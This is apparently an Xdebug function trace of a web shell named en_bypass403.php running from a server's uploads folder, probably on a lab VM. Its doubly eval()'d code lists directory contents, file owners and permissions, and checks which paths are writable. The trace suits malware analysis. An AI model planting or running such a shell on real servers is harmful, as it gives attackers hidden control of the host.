3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	158	$dir = '/var/www/html/uploads'
4	28	0	0.003869	585296	str_replace	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	160	3	'\\'	'/'	'/var/www/html/uploads'
4	28	1	0.003885	585392
4	28	R			'/var/www/html/uploads'
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	160	$dir = '/var/www/html/uploads'
4	29	0	0.003910	585296	explode	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	161	2	'/'	'/var/www/html/uploads'
4	29	1	0.003926	585872
4	29	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	161	$scdir = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	162	$i = 0
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	162	$i++
4	30	0	0.003989	585800	scandir	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	508	1	'/var/www/html/uploads'
4	30	1	0.004020	586432
4	30	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'en_bypass403.php', 5 => 'prepend.php']
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	508	$scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'en_bypass403.php', 5 => 'prepend.php']
4	31	0	0.004058	586400	getcwd	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	509	0
4	31	1	0.004072	586448
4	31	R			'/var/www/html/uploads'
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	509	$pa = '/var/www/html/uploads'
4	32	0	0.004098	586448	dirname	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	524	1	'/var/www/html/uploads'
4	32	1	0.004112	586528
4	32	R			'/var/www/html'
4	33	0	0.004127	586448	filemtime	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	532	1	'/var/www/html/uploads/.'
4	33	1	0.004147	586488
4	33	R			1676251914
4	34	0	0.004160	586400	date	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	532	2	'Y-m-d H:i:s'	1676251914
4	34	1	0.004199	587568
4	34	R			'2023-02-13 08:31:54'
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	532	$dt = '2023-02-13 08:31:54'
4	35	0	0.004229	587496	function_exists	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	533	1	'posix_getpwuid'
4	35	1	0.004243	587536
4	35	R			TRUE
4	36	0	0.004257	587544	fileowner	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	534	1	'/var/www/html/uploads/.'
4	36	1	0.004271	587584
4	36	R			0
4	37	0	0.004283	587496	posix_getpwuid	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	534	1	0
4	37	1	0.004311	588296
4	37	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	534	$downer = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	535	$downer = 'root'
4	38	0	0.004366	587528	function_exists	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	539	1	'posix_getgrgid'
4	38	1	0.004380	587568
4	38	R			TRUE
4	39	0	0.004394	587576	filegroup	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	540	1	'/var/www/html/uploads/.'
4	39	1	0.004408	587616
4	39	R			0
4	40	0	0.004420	587528	posix_getgrgid	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	540	1	0
4	40	1	0.004444	588184
4	40	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	540	$dgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	541	$dgrp = 'root'
4	41	0	0.004492	587608	is_dir	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	545	1	'/var/www/html/uploads/.'
4	41	1	0.004507	587648
4	41	R			TRUE
4	42	0	0.004521	587616	filemtime	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	532	1	'/var/www/html/uploads/..'
4	42	1	0.004537	587664
4	42	R			1676251914
4	43	0	0.004550	587568	date	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	532	2	'Y-m-d H:i:s'	1676251914
4	43	1	0.004567	587896
4	43	R			'2023-02-13 08:31:54'
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	532	$dt = '2023-02-13 08:31:54'
4	44	0	0.004592	587568	function_exists	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	533	1	'posix_getpwuid'
4	44	1	0.004607	587608
4	44	R			TRUE
4	45	0	0.004619	587624	fileowner	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	534	1	'/var/www/html/uploads/..'
4	45	1	0.004633	587664
4	45	R			0
4	46	0	0.004645	587568	posix_getpwuid	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	534	1	0
4	46	1	0.004760	588368
4	46	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	534	$downer = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	535	$downer = 'root'
4	47	0	0.004830	587568	function_exists	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	539	1	'posix_getgrgid'
4	47	1	0.004845	587608
4	47	R			TRUE
4	48	0	0.004858	587624	filegroup	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	540	1	'/var/www/html/uploads/..'
4	48	1	0.004872	587664
4	48	R			0
4	49	0	0.004884	587568	posix_getgrgid	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	540	1	0
4	49	1	0.004907	588224
4	49	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	540	$dgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	541	$dgrp = 'root'
4	50	0	0.004960	587624	is_dir	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	545	1	'/var/www/html/uploads/..'
4	50	1	0.004976	587664
4	50	R			TRUE
4	51	0	0.004989	587624	filemtime	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	532	1	'/var/www/html/uploads/.htaccess'
4	51	1	0.005006	587664
4	51	R			1676251914
4	52	0	0.005019	587568	date	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	532	2	'Y-m-d H:i:s'	1676251914
4	52	1	0.005036	587896
4	52	R			'2023-02-13 08:31:54'
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	532	$dt = '2023-02-13 08:31:54'
4	53	0	0.005063	587568	function_exists	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	533	1	'posix_getpwuid'
4	53	1	0.005077	587608
4	53	R			TRUE
4	54	0	0.005090	587624	fileowner	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	534	1	'/var/www/html/uploads/.htaccess'
4	54	1	0.005104	587664
4	54	R			0
4	55	0	0.005116	587568	posix_getpwuid	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	534	1	0
4	55	1	0.005139	588368
4	55	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	534	$downer = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	535	$downer = 'root'
4	56	0	0.005192	587568	function_exists	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	539	1	'posix_getgrgid'
4	56	1	0.005206	587608
4	56	R			TRUE
4	57	0	0.005219	587624	filegroup	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	540	1	'/var/www/html/uploads/.htaccess'
4	57	1	0.005234	587664
4	57	R			0
4	58	0	0.005246	587568	posix_getgrgid	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	540	1	0
4	58	1	0.005269	588224
4	58	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	540	$dgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	541	$dgrp = 'root'
4	59	0	0.005316	587624	is_dir	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	545	1	'/var/www/html/uploads/.htaccess'
4	59	1	0.005331	587664
4	59	R			FALSE
4	60	0	0.005344	587624	filemtime	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	532	1	'/var/www/html/uploads/data'
4	60	1	0.005360	587664
4	60	R			1676251914
4	61	0	0.005373	587568	date	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	532	2	'Y-m-d H:i:s'	1676251914
4	61	1	0.005390	587896
4	61	R			'2023-02-13 08:31:54'
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	532	$dt = '2023-02-13 08:31:54'
4	62	0	0.005416	587568	function_exists	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	533	1	'posix_getpwuid'
4	62	1	0.005430	587608
4	62	R			TRUE
4	63	0	0.005443	587624	fileowner	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	534	1	'/var/www/html/uploads/data'
4	63	1	0.005457	587664
4	63	R			0
4	64	0	0.005469	587568	posix_getpwuid	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	534	1	0
4	64	1	0.005492	588368
4	64	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	534	$downer = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	535	$downer = 'root'
4	65	0	0.005545	587568	function_exists	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	539	1	'posix_getgrgid'
4	65	1	0.005559	587608
4	65	R			TRUE
4	66	0	0.005572	587624	filegroup	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	540	1	'/var/www/html/uploads/data'
4	66	1	0.005586	587664
4	66	R			0
4	67	0	0.005598	587568	posix_getgrgid	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	540	1	0
4	67	1	0.005623	588224
4	67	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	540	$dgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	541	$dgrp = 'root'
4	68	0	0.005671	587624	is_dir	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	545	1	'/var/www/html/uploads/data'
4	68	1	0.005685	587664
4	68	R			TRUE
4	69	0	0.005699	587624	is_writable	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	553	1	'/var/www/html/uploads/data'
4	69	1	0.005716	587664
4	69	R			TRUE
4	70	0	0.005729	587624	p	1		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	555	1	'/var/www/html/uploads/data'
5	71	0	0.005743	587624	fileperms	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	55	1	'/var/www/html/uploads/data'
5	71	1	0.005757	587664
5	71	R			16895
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	55	$p = 16895
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	56	$i = 'u'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	61	$i = 'd'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	64	$i .= 'r'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	65	$i .= 'w'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	66	$i .= 'x'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	67	$i .= 'r'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	68	$i .= 'w'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	69	$i .= 'x'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	70	$i .= 'r'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	71	$i .= 'w'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	72	$i .= 'x'
4	70	1	0.005898	587664
4	70	R			'drwxrwxrwx'
4	72	0	0.005913	587624	is_writable	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	556	1	'/var/www/html/uploads/data'
4	72	1	0.005929	587664
4	72	R			TRUE
4	73	0	0.005948	587744	filemtime	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	532	1	'/var/www/html/uploads/en_bypass403.php'
4	73	1	0.005965	587792
4	73	R			1676251914
4	74	0	0.005978	587688	date	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	532	2	'Y-m-d H:i:s'	1676251914
4	74	1	0.005995	588016
4	74	R			'2023-02-13 08:31:54'
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	532	$dt = '2023-02-13 08:31:54'
4	75	0	0.006021	587688	function_exists	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	533	1	'posix_getpwuid'
4	75	1	0.006035	587728
4	75	R			TRUE
4	76	0	0.006048	587752	fileowner	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	534	1	'/var/www/html/uploads/en_bypass403.php'
4	76	1	0.006062	587792
4	76	R			1000
4	77	0	0.006074	587688	posix_getpwuid	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	534	1	1000
4	77	1	0.006105	588504
4	77	R			['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	534	$downer = ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	535	$downer = 'osboxes'
4	78	0	0.006160	587688	function_exists	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	539	1	'posix_getgrgid'
4	78	1	0.006174	587728
4	78	R			TRUE
4	79	0	0.006187	587752	filegroup	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	540	1	'/var/www/html/uploads/en_bypass403.php'
4	79	1	0.006201	587792
4	79	R			1000
4	80	0	0.006214	587688	posix_getgrgid	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	540	1	1000
4	80	1	0.006246	588344
4	80	R			['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	540	$dgrp = ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	541	$dgrp = 'osboxes'
4	81	0	0.006298	587752	is_dir	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	545	1	'/var/www/html/uploads/en_bypass403.php'
4	81	1	0.006313	587792
4	81	R			FALSE
4	82	0	0.006326	587752	filemtime	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	532	1	'/var/www/html/uploads/prepend.php'
4	82	1	0.006342	587792
4	82	R			1676251914
4	83	0	0.006355	587688	date	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	532	2	'Y-m-d H:i:s'	1676251914
4	83	1	0.006372	588016
4	83	R			'2023-02-13 08:31:54'
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	532	$dt = '2023-02-13 08:31:54'
4	84	0	0.006397	587688	function_exists	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	533	1	'posix_getpwuid'
4	84	1	0.006412	587728
4	84	R			TRUE
4	85	0	0.006424	587752	fileowner	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	534	1	'/var/www/html/uploads/prepend.php'
4	85	1	0.006438	587792
4	85	R			0
4	86	0	0.006451	587688	posix_getpwuid	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	534	1	0
4	86	1	0.006474	588488
4	86	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	534	$downer = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	535	$downer = 'root'
4	87	0	0.006527	587688	function_exists	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	539	1	'posix_getgrgid'
4	87	1	0.006541	587728
4	87	R			TRUE
4	88	0	0.006554	587752	filegroup	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	540	1	'/var/www/html/uploads/prepend.php'
4	88	1	0.006568	587792
4	88	R			0
4	89	0	0.006580	587688	posix_getgrgid	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	540	1	0
4	89	1	0.006603	588344
4	89	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	540	$dgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	541	$dgrp = 'root'
4	90	0	0.006649	587752	is_dir	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	545	1	'/var/www/html/uploads/prepend.php'
4	90	1	0.006665	587792
4	90	R			FALSE
4	91	0	0.006678	587736	filemtime	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	572	1	'/var/www/html/uploads/.'
4	91	1	0.006694	587760
4	91	R			1676251914
4	92	0	0.006707	587672	date	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	572	2	'Y-m-d H:i:s'	1676251914
4	92	1	0.006724	588000
4	92	R			'2023-02-13 08:31:54'
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	572	$ft = '2023-02-13 08:31:54'
4	93	0	0.006750	587976	is_file	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	573	1	'/var/www/html/uploads/.'
4	93	1	0.006764	588016
4	93	R			FALSE
4	94	0	0.006777	587984	filemtime	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	572	1	'/var/www/html/uploads/..'
4	94	1	0.006793	588032
4	94	R			1676251914
4	95	0	0.006805	587936	date	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	572	2	'Y-m-d H:i:s'	1676251914
4	95	1	0.006821	588264
4	95	R			'2023-02-13 08:31:54'
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	572	$ft = '2023-02-13 08:31:54'
4	96	0	0.006846	587992	is_file	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	573	1	'/var/www/html/uploads/..'
4	96	1	0.006861	588032
4	96	R			FALSE
4	97	0	0.006874	587992	filemtime	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	572	1	'/var/www/html/uploads/.htaccess'
4	97	1	0.006889	588032
4	97	R			1676251914
4	98	0	0.006905	587936	date	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	572	2	'Y-m-d H:i:s'	1676251914
4	98	1	0.006922	588264
4	98	R			'2023-02-13 08:31:54'
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	572	$ft = '2023-02-13 08:31:54'
4	99	0	0.006947	587992	is_file	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	573	1	'/var/www/html/uploads/.htaccess'
4	99	1	0.006960	588032
4	99	R			TRUE
4	100	0	0.006973	587936	function_exists	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	574	1	'posix_getpwuid'
4	100	1	0.006988	587976
4	100	R			TRUE
4	101	0	0.007001	587992	fileowner	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	575	1	'/var/www/html/uploads/.htaccess'
4	101	1	0.007015	588032
4	101	R			0
4	102	0	0.007027	587936	posix_getpwuid	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	575	1	0
4	102	1	0.007050	588736
4	102	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	575	$fowner = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	576	$fowner = 'root'
4	103	0	0.007104	587968	function_exists	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	580	1	'posix_getgrgid'
4	103	1	0.007118	588008
4	103	R			TRUE
4	104	0	0.007131	588024	filegroup	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	581	1	'/var/www/html/uploads/.htaccess'
4	104	1	0.007146	588064
4	104	R			0
4	105	0	0.007158	587968	posix_getgrgid	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	581	1	0
4	105	1	0.007180	588624
4	105	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	581	$fgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	582	$fgrp = 'root'
4	106	0	0.007229	588320	filesize	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	590	1	'.htaccess'
4	106	1	0.007245	588344
4	106	R			64
4	107	0	0.007258	588304	sz	1		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	590	1	64
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	32	$sz = [0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	33	$i = 0
5	108	0	0.007299	588304	round	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	34	2	64	2
5	108	1	0.007313	588376
5	108	R			64
4	107	1	0.007328	588336
4	107	R			'64 B'
4	109	0	0.007342	588040	is_writable	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	593	1	'/var/www/html/uploads/.htaccess'
4	109	1	0.007359	588080
4	109	R			FALSE
4	110	0	0.007372	588040	is_readable	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	594	1	'/var/www/html/uploads/.htaccess'
4	110	1	0.007389	588080
4	110	R			TRUE
4	111	0	0.007402	588040	p	1		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	595	1	'/var/www/html/uploads/.htaccess'
5	112	0	0.007416	588040	fileperms	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	55	1	'/var/www/html/uploads/.htaccess'
5	112	1	0.007431	588096
5	112	R			33188
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	55	$p = 33188
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	56	$i = 'u'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	59	$i = '-'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	64	$i .= 'r'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	65	$i .= 'w'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	66	$i .= '-'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	67	$i .= 'r'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	68	$i .= '-'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	69	$i .= '-'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	70	$i .= 'r'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	71	$i .= '-'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	72	$i .= '-'
4	111	1	0.007601	588096
4	111	R			'-rw-r--r--'
4	113	0	0.007628	588056	is_writable	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	596	1	'/var/www/html/uploads/.htaccess'
4	113	1	0.007645	588096
4	113	R			FALSE
4	114	0	0.007659	588056	is_readable	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	596	1	'/var/www/html/uploads/.htaccess'
4	114	1	0.007675	588096
4	114	R			TRUE
4	115	0	0.007689	588056	filemtime	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	572	1	'/var/www/html/uploads/data'
4	115	1	0.007704	588096
4	115	R			1676251914
4	116	0	0.007718	588000	date	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	572	2	'Y-m-d H:i:s'	1676251914
4	116	1	0.007734	588328
4	116	R			'2023-02-13 08:31:54'
